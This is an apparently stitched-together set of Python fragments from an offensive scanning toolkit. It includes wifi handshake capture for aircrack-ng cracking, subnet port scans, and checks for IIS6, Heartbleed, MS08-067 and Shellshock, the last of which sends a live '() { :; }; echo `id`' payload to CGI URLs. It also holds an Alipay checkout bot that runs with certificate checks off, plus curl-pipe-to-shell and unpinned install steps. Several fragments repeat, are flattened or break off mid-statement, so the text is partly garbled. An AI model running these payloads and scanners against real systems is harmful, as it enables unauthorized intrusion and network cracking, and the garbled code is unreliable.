def worker2():
    """Poll the capture files until aircrack-ng reports a handshake.

    Every 10 seconds aircrack-ng is run over /tmp/*.cap for the module-level
    ``bssid`` and its output is teed to /tmp/xwifiresult.txt. While that output
    is empty or matches "no data" / "No valid", the running ``airport ... sniff``
    process is killed, the capture files are deleted and ``worker1`` is started
    in a new process. Once the output no longer matches, the sniffer is killed
    one last time and a success message is printed.
    """
    find_sniffer_pid = "ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o"
    while True:
        # The original comment said 60 s; the code waits 10 s between checks.
        time.sleep(10)
        os.system(
            "aircrack-ng -w /tmp/forhandshakedict.txt -b %s /tmp/*.cap | tee /tmp/xwifiresult.txt"
            % bssid)
        with open("/tmp/xwifiresult.txt", "r+") as f:
            content = f.read()
        still_waiting = re.search(r"(no data)|(No valid)", content,
                                  re.I) or content == ""
        if not still_waiting:
            break
        print(
            "I am sniffing a handshake but no one logins the wifi,so you have to wait,keep me running..."
        )
        sniffPID = get_string_from_command(find_sniffer_pid)
        os.system("kill %s" % sniffPID)
        os.system("rm /tmp/*.cap")
        # Deliberately not joined: joining would block this loop and the next
        # check would never run.
        Process(target=worker1, args=()).start()
    sniffPID = get_string_from_command(find_sniffer_pid)
    os.system("kill %s" % sniffPID)
    print("Congratulations! Got handshake!")
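def domain_has_cdn(self):
    """Guess from DNS answers whether ``self.domain`` sits behind a CDN.

    Two heuristics are applied in order:

    1. the NS records of the root domain are searched for CDN vendor keywords;
    2. otherwise the domain counts as CDN-backed when more than one
       IPv4-looking string appears in its A-record answer.

    Returns:
        dict: ``{'has_cdn': 1, 'is_cloud_flare': 1}`` when the NS answer names
        Cloudflare, ``{'has_cdn': 1, 'is_cloud_flare': 0}`` for any other hit,
        ``{'has_cdn': 0, 'is_cloud_flare': 0}`` when neither heuristic fires.
    """
    import re
    import shlex

    CLIOutput().good_print("现在检测domain:%s是否有cdn" % self.domain)
    # NS (like MX) records are published on the root domain, e.g. baidu.com
    # rather than www.baidu.com.
    # The value is quoted because the command travels as one string;
    # get_string_from_command() presumably hands it to a shell — confirm.
    result = get_string_from_command(
        "dig ns %s +short" % shlex.quote(get_root_domain(self.domain)))
    # The duplicated "(incapsula)" alternative of the original was dropped; the
    # set of matching strings is unchanged.
    pattern = re.compile(
        r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(jsdelivr)|(akamai)",
        re.I)
    cloudflare_pattern = re.compile(r"cloudflare", re.I)
    if re.search(pattern, result):
        if re.search(cloudflare_pattern, result):
            print("has_cdn=1 from ns,and cdn is cloudflare")
            return {'has_cdn': 1, 'is_cloud_flare': 1}
        print("has_cdn=1 from ns")
        return {'has_cdn': 1, 'is_cloud_flare': 0}

    # Fallback: more than one A record is treated as a sign of a CDN.
    result = get_string_from_command(
        "dig a %s +short" % shlex.quote(self.domain))
    a_records = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result)
    if len(a_records) > 1:
        return {'has_cdn': 1, 'is_cloud_flare': 0}
    return {'has_cdn': 0, 'is_cloud_flare': 0}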
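def get_c_80_or_443_list(self, ip):
    """Return the addresses nmap prints for ``ip``'s /24 with ``self.port`` open.

    Args:
        ip: IPv4 address whose surrounding /24 is scanned.

    Returns:
        list[str]: de-duplicated IPv4-looking strings found in nmap's output
        (order not defined), or ``0`` when the nmap command is not available.
    """
    if "not found" in get_string_from_command("nmap"):
        print("[-]需要安装nmap命令")
        return 0
    scanPort = self.port
    print("[*]现在进行 %s 的c段开了 %s 端口机器的扫描" % (ip, scanPort))
    # Arguments are passed as a list with no shell in between, so characters in
    # ``ip`` or ``self.port`` cannot be interpreted as shell syntax.
    nmap_argv = [
        "nmap", "-p", str(scanPort), "-sS", "-sV", "-T4", "-v", "-n",
        "--min-hostgroup", "4", "--min-parallelism", "1024",
        "--host-timeout", "30", "-Pn", "--open", "%s/24" % ip,
    ]
    popen = subprocess.Popen(nmap_argv, stdout=subprocess.PIPE, close_fds=True)
    result, _ = popen.communicate()
    result = result.decode("utf-8", "ignore")
    # NOTE(review): every dotted quad in the output is collected, so version
    # strings printed by -sV that look like an address would be included too.
    found = re.findall(r"(?:\d{1,3}\.){3}\d{1,3}", result)
    return list(set(found))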
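def get_ip_from_mx_record(self):
    """Resolve the MX hosts that live under ``self.domain``'s root domain.

    The MX answer for the root domain is filtered to host names ending in that
    root domain, each is resolved, and the first address of every host that
    resolves is collected once.

    Returns:
        list[str]: distinct first addresses of the matching MX hosts; hosts
        that fail to resolve are skipped.
    """
    print("尝试从mx记录中找和%s顶级域名相同的mx主机" % self.domain)
    import shlex
    import socket
    from exp10it import get_root_domain
    from exp10it import get_string_from_command

    # self.domain looks like www.baidu.com; MX records sit on baidu.com.
    root_domain = get_root_domain(self.domain)
    # Quoted because the command is passed as a single string (presumably to a
    # shell — confirm against get_string_from_command).
    result = get_string_from_command(
        "dig %s +short mx" % shlex.quote(root_domain))
    # re.escape replaces the hand-written "." escaping, which relied on the
    # invalid string escape "\." and left other metacharacters untouched.
    sub_domains_list = re.findall(
        r"\d{1,} (.*\.%s)\." % re.escape(root_domain), result)
    ip_list = []
    for each in sub_domains_list:
        print(each)
        try:
            addresses = socket.gethostbyname_ex(each)[2]
        except (socket.gaierror, socket.herror):
            # An MX host without an address record must not abort the scan.
            continue
        if addresses and addresses[0] not in ip_list:
            ip_list.append(addresses[0])
    return ip_list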
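def get_c_80_or_443_list(self,ip):
    """Return the addresses masscan prints for ``ip``'s /24 on the web port.

    The port is 80 when ``self.http_or_https`` is "http" and 443 when it is
    "https"; any other value yields an empty list (the original raised
    UnboundLocalError there because no port had been chosen).

    Args:
        ip: IPv4 address whose surrounding /24 is scanned.

    Returns:
        list[str]: IPv4-looking strings found in masscan's standard output, in
        output order, duplicates kept.
    """
    import re
    import subprocess

    if "not found" in get_string_from_command("masscan"):
        # NOTE(review): installs a package at run time without confirmation.
        os.system("apt-get install masscan")
    if self.http_or_https=="http":
        scanPort=80
        CLIOutput().good_print("现在进行%s的c段开了80端口机器的扫描" % ip)
    elif self.http_or_https=="https":
        scanPort=443
        CLIOutput().good_print("现在进行%s的c段开了443端口机器的扫描" % ip)
    else:
        return []
    # Output is captured directly instead of being redirected to the fixed,
    # guessable path /tmp/masscan.out, which another local user could create
    # or link in advance. The argument list also keeps ``ip`` away from a shell.
    try:
        completed = subprocess.run(
            ["masscan", "-p%d" % scanPort, "%s/24" % ip],
            stdout=subprocess.PIPE)
        strings = completed.stdout.decode("utf-8", "ignore")
    except OSError:
        # masscan still missing: behave like an empty scan result.
        strings = ""
    ipList = re.findall(r"(?:\d{1,3}\.){3}\d{1,3}", strings)
    print(ipList)
    return ipList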
# Module script: for a target given on the command line, run the local iis6.py
# check against every open port that is not listed as a non-web port, and append
# any positive result to result.txt next to this script.
# NOTE(review): indentation was lost in this listing; the nesting below is a
# reconstruction — confirm against the original file. os, re, get_server_type,
# get_string_from_command and CLIOutput are used but not imported in the visible
# part.
import sys
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exploit import get_target_open_port_list

# Directory of this script; iis6.py is run from it and result.txt is written to it.
current_dir = os.path.split(os.path.realpath(__file__))[0]
# The target is the first command-line argument.
target = sys.argv[1]
print("checking iis vul for " + target)
# Keep only what follows the last "/" of the target.
domain = target.split("/")[-1]
open_port_list = get_target_open_port_list(target)
for each_port in open_port_list:
    if each_port not in COMMON_NOT_WEB_PORT_LIST:
        server_type = get_server_type(target)
        # Only servers whose type string matches "iis/6" are checked.
        if not re.search(r"iis/6", server_type, re.I):
            continue
        # NOTE(review): domain and each_port are placed unquoted into a command
        # string; if the helper runs it through a shell, a crafted target value
        # executes on the machine running this script — confirm and quote.
        a = get_string_from_command("cd %s && python2 iis6.py %s %s" %
                                    (current_dir, domain, each_port))
        if re.search(r"HHIT CVE-2017-7269 Success", a, re.I):
            string_to_write = "Congratulations! 存在iis6.0远程溢出漏洞:\n%s:%s" % (
                domain, each_port)
            # NOTE(review): good_print is called on the class, not on an
            # instance — confirm it can be called this way.
            CLIOutput.good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                f.write(string_to_write)
else:
    # NOTE(review): laid out here as the loop's else clause. The loop has no
    # break, so in that reading the message prints after every complete pass,
    # not only when the port list is empty — confirm the intended nesting.
    print(
        "coz I found no nmap scan result from database,I will test only on the default port but not test on all open ports"
    )
# Module script: for a target given on the command line, run the local
# ssltest.py against every open port that is not listed as a non-web port and
# append any positive result to result.txt next to this script.
# NOTE(review): indentation was lost in this listing; the nesting below is a
# reconstruction — confirm against the original file. os, re, sys, urlparse,
# get_string_from_command, get_target_table_name_list and CLIOutput are used but
# not imported in the visible part.
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list

# Directory of this script; ssltest.py is run from it and result.txt is written to it.
current_dir = os.path.split(os.path.realpath(__file__))[0]
# The target is the first command-line argument.
target = sys.argv[1]
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
# http_domain and target_table_name are assigned but not read in the visible code.
http_domain = get_http_domain_from_url(target)
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
parsed = urlparse(target)
# The port list is fetched a second time, replacing the first result.
open_port_list = get_target_open_port_list(target)
# A port written explicitly in the URL is added to the list (as a string).
if ":" in parsed.netloc:
    open_port_list.append(parsed.netloc.split(":")[1])
for each in open_port_list:
    if each not in COMMON_NOT_WEB_PORT_LIST:
        # NOTE(review): hostname and the port are placed unquoted into a command
        # string; if the helper runs it through a shell, a crafted target value
        # executes on the machine running this script — confirm and quote.
        a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " %
                                    (current_dir, each, hostname))
        if re.search(r"server is vulnerable", a, re.I):
            string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
                hostname, each)
            CLIOutput().good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                f.write(string_to_write)
else:
    # NOTE(review): laid out here as the loop's else clause. The loop has no
    # break, so in that reading the message prints after every complete pass,
    # not only when the port list is empty — confirm the intended nesting.
    print(
        "coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports"
    )
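def buy_ipx():
    """Drive a PhantomJS session through an Apple Store (CN) order paid with Alipay.

    The function reads names that are not defined in this block and must exist
    at module level: ``proxy_url``, ``cookie``, ``apple_id``, ``apple_id_pass``,
    ``try_index``, ``zhifubao_username`` and ``zhifumima``. It returns nothing;
    everything it does is a browser or shell side effect.

    Changes against the listing: the garbled ``import wget --no-cache`` /
    ``wget --no-cache.download`` tokens (a syntax error) are restored to the
    ``wget`` module, and the bare ``except`` is narrowed to ``Exception``.
    NOTE(review): indentation was lost in this listing; the nesting is a
    reconstruction — confirm against the original file.
    """
    # NOTE(review): an unpinned package is installed at run time.
    if module_exist("selenium") is False:
        os.system("pip3 install selenium")
    from selenium import webdriver
    from selenium.common.exceptions import TimeoutException
    result = get_string_from_command("phantomjs --help")
    if re.search(r"(not found)|(不是内部或外部命令)|(Unknown command)", result,re.I):
        # PhantomJS is missing: install it with the platform's package manager.
        if platform.system() == "Darwin":
            os.system("brew install phantomjs")
        elif platform.system() == 'Linux':
            os.system("echo y | apt-get install phantomjs")
        elif platform.system() == 'Windows':
            import wget
            try:
                wget.download(
                    "https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip",
                    out="phantomjs.zip")
            except Exception:
                print(
                    "Please download phantomjs from the official site and add the executeable file to your path")
            input("下载速度太慢,还是手工用迅雷下载吧,下载后将可执行文件phantomjs.exe存放到PATH中,再按任意键继续...")
    import time
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions

    # NOTE(review): --ignore-ssl-errors=true and --web-security=false switch off
    # certificate checking and cross-origin protection for the same session that
    # later types the Apple ID and Alipay passwords; a proxy or other on-path
    # host could then read them. Drop both flags unless a concrete need is
    # documented.
    if proxy_url == "" or proxy_url == 0:
        service_args_value = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false']
    else:
        # proxy_url is expected as "<type>://<host>:<port>".
        proxy_type = proxy_url.split(":")[0]
        proxy_value_with_type = proxy_url.split("/")[-1]
        service_args_value = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false',
                              '--proxy=%s' % proxy_value_with_type, '--proxy-type=%s' % proxy_type]
    #service_args_value.append('--load-images=no')  # would disable image loading
    service_args_value.append('--disk-cache=yes')  # enable the disk cache
    from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
    dcap = dict(DesiredCapabilities.PHANTOMJS)
    ua = "Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
    if cookie!="":
        headers = {'User-Agent': '%s' % ua,'Cookie': '%s' % cookie}
    else:
        headers = {'User-Agent': '%s' % ua}
    # The custom headers are written into the class-level capability dict, so
    # they apply to every PhantomJS driver created afterwards in this process.
    for key in headers:
        capability_key = 'phantomjs.page.custom_headers.{}'.format(key)
        webdriver.DesiredCapabilities.PHANTOMJS[capability_key] = headers[key]
    driver = webdriver.PhantomJS(service_args=service_args_value)
    driver.implicitly_wait(300)
    driver.set_page_load_timeout(300)

    def _wait_clickable(by, value):
        # Block (up to 300 s) until the located element can be clicked.
        WebDriverWait(driver, 300).until(
            expected_conditions.element_to_be_clickable((by, value)))

    # Not signed in yet: the favorites page redirects to the sign-in form.
    print("目前没有登录,现在访问收藏夹,尝试跳转到登录页面")
    driver.get("https://www.apple.com/cn/shop/favorites")
    _wait_clickable(By.NAME, 'login-apple_id')
    user_text_box=driver.find_element_by_name('login-apple_id')
    user_text_box.clear()
    user_text_box.send_keys(apple_id)
    pass_text_box=driver.find_element_by_name('login-password')
    pass_text_box.clear()
    pass_text_box.send_keys(apple_id_pass)
    login_button=driver.find_element_by_id('sign-in')
    print("现在点击登录按钮")
    login_button.click()
    import random
    title = driver.title
    print(title)
    content = driver.page_source
    # Poll once a second until the favorites list has rendered its product links.
    while True:
        pic_links=driver.find_elements_by_class_name('relatedlink')
        if pic_links and len(pic_links)>0:
            print(len(pic_links))
            break
        time.sleep(1)
    # The wanted product is picked by its 1-based position, try_index
    # (original note: entries [1] and [2] are the iPhone X; adjust as needed).
    pic_links[try_index-1].click()
    _wait_clickable(By.NAME, 'add-to-cart')
    add_to_cart_link=driver.find_element_by_name('add-to-cart')
    add_to_cart_link.click()
    print("现在加入到购物车")
    _wait_clickable(By.ID, 'cart-actions-checkout')
    jie_zhang_link=driver.find_element_by_id('cart-actions-checkout')
    print("现在点击结帐")
    jie_zhang_link.click()
    # Checkout asks for the sign-in again; the listing has placeholder 'xxx'
    # values here instead of the apple_id / apple_id_pass variables.
    _wait_clickable(By.NAME, 'login-apple_id')
    user_text_box=driver.find_element_by_name('login-apple_id')
    user_text_box.clear()
    user_text_box.send_keys('xxx')
    pass_text_box=driver.find_element_by_name('login-password')
    pass_text_box.clear()
    pass_text_box.send_keys('xxx')
    login_button=driver.find_element_by_id('sign-in')
    print("现在点击登录按钮")
    login_button.click()
    # NOTE(review): screenshots of sign-in and payment pages go to fixed names
    # under /tmp, where other local users may be able to read or pre-create
    # them; a private directory would be safer.
    driver.get_screenshot_as_file("/tmp/PhantomJSPic3")
    _wait_clickable(By.ID, 'cart-continue-button')
    continue_button1=driver.find_element_by_id('cart-continue-button')
    continue_button1.click()
    continue_button2=driver.find_element_by_id('shipping-continue-button')
    continue_button2.click()
    # Choose Alipay as the payment method.
    _wait_clickable(By.ID, 'payment-form-options-Alipay-0')
    zhifubao_button=driver.find_element_by_id('payment-form-options-Alipay-0')
    zhifubao_button.click()
    payment_continue_button=driver.find_element_by_id('payment-continue-button')
    payment_continue_button.click()
    _wait_clickable(By.ID, 'invoice-next-step')
    invoice_next_step_button=driver.find_element_by_id('invoice-next-step')
    invoice_next_step_button.click()
    _wait_clickable(By.ID, 'terms-accept')
    terms_accept_button=driver.find_element_by_id('terms-accept')
    terms_accept_button.click()
    _wait_clickable(By.ID, 'terms-continue-button')
    terms_continue_button=driver.find_element_by_id('terms-continue-button')
    terms_continue_button.click()
    _wait_clickable(By.ID, 'place-order-button')
    place_order_button=driver.find_element_by_id('place-order-button')
    place_order_button.click()
    _wait_clickable(By.ID, 'pay_now')
    pay_now_button=driver.find_element_by_id('pay_now')
    pay_now_button.click()
    # Alipay sign-in form.
    _wait_clickable(By.ID, 'J_tLoginId')
    zhifubao_username_box=driver.find_element_by_id('J_tLoginId')
    zhifubao_username_box.click()
    zhifubao_username_box.clear()
    zhifubao_username_box.send_keys(zhifubao_username)
    zhifubao_pass_box=driver.find_element_by_id('pay_passwd_rsainput')
    zhifubao_pass_box.click()
    zhifubao_pass_box.send_keys(zhifumima)
    driver.get_screenshot_as_file("/tmp/PhantomJSPic4")
    os.system("open /tmp/PhantomJSPic4")
    time.sleep(3)
    print("现在在支付宝中确认付款")
    driver.get_screenshot_as_file("/tmp/PhantomJSPic5")
    driver.find_element_by_id('J_newBtn').click()
    os.system("open /tmp/PhantomJSPic5")
    # Wait for the Alipay cashier page, then enter the payment password.
    WebDriverWait(driver, 300).until(
        expected_conditions.url_contains(
            'standard/lightpay/light_pay_cashier.htm'))
    tmp=driver.find_element_by_id('pay_password_rsainput')
    tmp.click()
    tmp.send_keys(zhifumima)
    driver.get_screenshot_as_file("/tmp/PhantomJSPic6")
    print("最后确认付款")
    tmp=driver.find_element_by_id('J_authSubmit')
    tmp.click()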
#############################################################
### __ / _ | \_) |
### _ \\ \ / _ \ | ( || _|
### ___/ _\_\.__/_|\__/_|\__|
### _|
###
### name: 3xp10it.py
### function: exp10itScanner
### date: 2016-11-07
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
# Launcher: upgrade the exp10it package, show the banner, make sure two apt
# packages are present, then hand over to exp10itScanner().
import re
import os
import time

# NOTE(review): the newest exp10it release is fetched and installed on every
# start, unpinned and unverified, and the imports below then run it with this
# script's privileges. Pinning a version (ideally with hashes) and installing
# outside the launcher would remove that supply-chain exposure.
os.system("pip3 install exp10it -U --no-cache-dir")
from exp10it import figlet2file
from exp10it import exp10itScanner
from exp10it import get_string_from_command

figlet2file("3xp10it", 0, True)
time.sleep(1)
# Install each apt package whose name does not appear in `apt list <name>`.
for package_name in ("python-requests", "python-dnspython"):
    a = get_string_from_command("apt list %s" % package_name)
    if not re.search(package_name, a, re.I):
        os.system("apt-get install %s" % package_name)
exp10itScanner()
"/cgi-bin/webmail.cgi", ] target = sys.argv[1] print("checking shellshock vul for " + target) http_domain = get_http_domain_from_url(target) urls = get_target_urls_from_db(target, "exp10itdb") urls.append(target) for each_url in urls: if "^" in each_url: each_url = each_url.split("^")[0] parsed = urlparse(each_url) url = parsed.scheme + "://" + parsed.netloc + parsed.path if re.search(r"\.cgi$", url, re.I): a = get_string_from_command( "curl '%s' -A '() { :; }; echo; echo `id`' -k" % url) if re.search(r"uid=", a, re.I): string_to_write = "Congratulations! shellshock vul exists on %s\n%s" % url CLIOutput().good_print(string_to_write) with open("%s/result.txt" % current_dir, "a+") as f: f.write(string_to_write) else: print("no shellshock vul") if target[:4] == "http": hostname = urlparse(target).hostname target_table_name = get_target_table_name_list(target)[0] open_port_list = get_target_open_port_list(target) parsed = urlparse(target)
import os import re import requests os.system("pip3 install exp10it -U") from exp10it import get_string_from_command from exp10it import get_request sysinfo = get_string_from_command("uname -a") # 安装git,为了后面能安装vundle a=get_string_from_command("git help") if re.search(r"(未找到命令)|(not found)|(unknown command)",a,re.I): if re.search(r"(ubuntu)|(debain)",sysinfo,re.I): os.system("apt-get install git") if re.search(r"darwin",sysinfo,re.I): os.system("brew install git") with open("/etc/shells", "r") as f: content = f.read() pur = input("1.只更新配置文件\n2.安装zsh+vim+tmux+配置文件\n3.安装fish+vim+tmux+配置文件\ninput your choose here:>") if pur == '1': pass elif pur == '2': # 下面设置zsh为默认shell if not re.search(r"/bin/zsh", content, re.I): os.system('''echo "/bin/zsh" | sudo tee -a /etc/shells''') os.system("chsh -s `which zsh`") # 下面安装oh-my-zsh os.system('''sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" && exit''') # 上面之后要退出zsh,要不然后续的安装过程无法继续(除非人工ctrl+d) else:
# test on:macOS sierra 10.12.5 import time import os os.system("pip3 install exp10it -U --no-cache --retries 0") from exp10it import figlet2file figlet2file("xwifi", 0, True) time.sleep(1) from exp10it import get_string_from_command from exp10it import get_all_file_name from multiprocessing import Process import re import time import sys os.system("echo testfor_handshake > /tmp/forhandshakedict.txt") a = get_string_from_command("ack") if re.search(r"not found", a, re.I): input( "Please install ack first,eg.brew install ack,after you finished it,press anykey to continue." ) a = get_string_from_command("airport") if re.search(r"not found", a, re.I): a = get_string_from_command( '''find /System/Library -name "airport" | ack "^/.*/airport$"''') os.system("ln -s %s /usr/local/bin/airport" % a) #print("add your airport to path,then run me again.") a = get_string_from_command("aircrack-ng") if re.search(r"not found", a, re.I): input( "Please install aircrack-ng first,eg.brew install aircrack-ng,after you finished it,press anykey to continue."
page.open(server, 'post', data, function (status) { if (status !== 'success') { console.log('Unable to post!'); } else { console.log(page.content); } phantom.exit(); }); ''' % (qihao, ++i) while True: os.system("rm post.js") with open("post.js", "a+") as f: f.write(post_js_content) proxy_addr = get_random_proxy() print(proxy_addr) html = get_string_from_command("phantomjs post.js --proxy=%s" % proxy_addr) has_page_no = re.search(r"/(\d+)页", html) if has_page_no: break else: print("没有获取到页数,尝试再次获取...") continue page_no = has_page_no.group(1) print("期号:%s,页数:%s" % (qihao, page_no)) page_list = [] for page in range(1, int(page_no) + 1): page_list.append(str(page)) def get_page_content(page): data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)
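def domain_has_cdn(self):
    """Guess from nslookup answers whether ``self.domain`` sits behind a CDN.

    Two heuristics are applied in order:

    1. the NS answer for the root domain is searched for CDN vendor keywords;
    2. otherwise the domain counts as CDN-backed when more than one
       IPv4-looking string appears in the A-record lookup output.

    Fix against the listing: both patterns were built from fourteen adjacent
    string literals, which Python concatenates. The keyword pattern still
    matched the same inputs, but the Cloudflare pattern became "cloudflare"
    repeated fourteen times and could never match, so ``is_cloud_flare`` was
    always 0. Each pattern is now written once.

    Returns:
        dict: ``{'has_cdn': 1, 'is_cloud_flare': 1}`` when the NS answer names
        Cloudflare, ``{'has_cdn': 1, 'is_cloud_flare': 0}`` for any other hit,
        ``{'has_cdn': 0, 'is_cloud_flare': 0}`` when neither heuristic fires.
    """
    import re
    import shlex

    print("[*]现在检测domain:%s是否有cdn" % self.domain)
    # NS (like MX) records are published on the root domain, e.g. baidu.com
    # rather than www.baidu.com. Arguments go to nslookup as a list with no
    # shell in between, so the domain cannot be read as shell syntax.
    try:
        popen = subprocess.Popen(
            ["nslookup", "-type=ns", get_root_domain(self.domain)],
            stdout=subprocess.PIPE,
            close_fds=True)
        result, _ = popen.communicate()
    except OSError:
        # nslookup not available: continue with an empty NS answer.
        result = b""
    result = result.decode("utf-8", "ignore")
    pattern = re.compile(
        r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(jsdelivr)|(akamai)",
        re.I)
    cloudflare_pattern = re.compile(r"cloudflare", re.I)
    if re.search(pattern, result):
        if re.search(cloudflare_pattern, result):
            print("has_cdn=1 from ns,and cdn is cloudflare")
            return {'has_cdn': 1, 'is_cloud_flare': 1}
        print("has_cdn=1 from ns")
        return {'has_cdn': 1, 'is_cloud_flare': 0}

    # Fallback: more than one A record is treated as a sign of a CDN.
    # Quoted because this command travels as one string (presumably to a
    # shell — confirm against get_string_from_command).
    result = get_string_from_command(
        "nslookup -type=a %s" % shlex.quote(self.domain))
    # NOTE(review): nslookup normally prints the resolver's own address before
    # the answer, so this count likely exceeds 1 even for a single A record —
    # confirm, and count only addresses in the answer section if so.
    a_records = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result)
    if len(a_records) > 1:
        return {'has_cdn': 1, 'is_cloud_flare': 0}
    return {'has_cdn': 0, 'is_cloud_flare': 0}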
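# This debug.py is for developers. Do not run it if you only want to run 3xp10it
# and not develop it.
# When the config file exists and the operator answers "1", it drops the
# exp10itdb database and deletes the config file.
import os
import re
import sys

# Prefer the development copy of exp10it under ~/mypypi over an installed one.
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from exp10it import execute_sql_in_db
from exp10it import get_string_from_command
from exp10it import CONFIG_INI_PATH

if os.path.exists(CONFIG_INI_PATH):
    db_name = "exp10itdb"
    a = input("1.删除config.ini和exp10itdb\n2....\n>")
    if a == '1':
        # Start MySQL first when the client reports it cannot connect.
        result = get_string_from_command("mysql")
        if re.search(r"Can't connect", result, re.I):
            os.system("service mysql start")
        execute_sql_in_db("drop database %s" % db_name)
        # os.remove replaces the shell "rm %s" call, which split the path on
        # spaces and let the shell interpret any metacharacters in it.
        try:
            os.remove(CONFIG_INI_PATH)
        except OSError as err:
            print("could not remove %s: %s" % (CONFIG_INI_PATH, err))
else:
    print("%s not exist" % CONFIG_INI_PATH)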
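# Module script: run nmap's smb-vuln-ms08-067 check against the target given on
# the command line and keep nmap's output as result.txt when it reports the host
# as vulnerable.
import os
import shlex
import shutil
import sys
import tempfile

# Prefer the copy of exp10it under ~/exp10it over an installed one.
exp10it_module_path = os.path.expanduser("~") + "/exp10it"
sys.path.insert(0, exp10it_module_path)
import re
import time
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput

target = sys.argv[1]
print("checking ms08-067 vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
# A URL is reduced to its host name; anything else is used as given.
if target[:4] == "http":
    target = urlparse(target).hostname
if not target:
    sys.exit("no host name could be taken from the target")
# The log used to be /tmp/commix_<timestamp>, a guessable name another local
# user could create or link beforehand; mkstemp creates a private, unique file.
log_fd, current_log_file = tempfile.mkstemp(prefix="commix_", dir="/tmp")
os.close(log_fd)
# Both values are quoted because the pipeline below needs a shell and the
# target comes straight from the command line.
cmd = "nmap --script=smb-vuln-ms08-067 %s 2>&1 | tee %s" % (
    shlex.quote(target), shlex.quote(current_log_file))
a = get_string_from_command(cmd)
# NOTE(review): this is a plain substring match, so output containing
# "NOT VULNERABLE" would also count as a hit — confirm against the script's
# actual output and tighten the pattern if needed.
if re.search(r"VULNERABLE", a, re.I):
    # Replaces any earlier result.txt, as the original "mv" did.
    shutil.move(current_log_file, os.path.join(current_dir, "result.txt"))
    # The message used to name MS10-010 although the check run is MS08-067.
    CLIOutput().good_print("Congratulations! MS08-067 exists on %s" % target)
else:
    os.remove(current_log_file)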
page.open(server, 'post', data, function (status) { if (status !== 'success') { console.log('Unable to post!'); } else { console.log(page.content); } phantom.exit(); }); ''' % (qihao, ++i) while True: os.system("rm post.js") with open("post.js", "a+") as f: f.write(post_js_content) proxy_addr = get_random_proxy() print(proxy_addr) html = get_string_from_command( "phantomjs post.js --proxy=%s" % proxy_addr) has_page_no = re.search(r"/(\d+)页", html) if has_page_no: break else: print("没有获取到页数,尝试再次获取...") continue page_no = has_page_no.group(1) print("期号:%s,页数:%s" % (qihao, page_no)) page_list = [] for page in range(1, int(page_no) + 1): page_list.append(str(page)) def get_page_content(page): data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)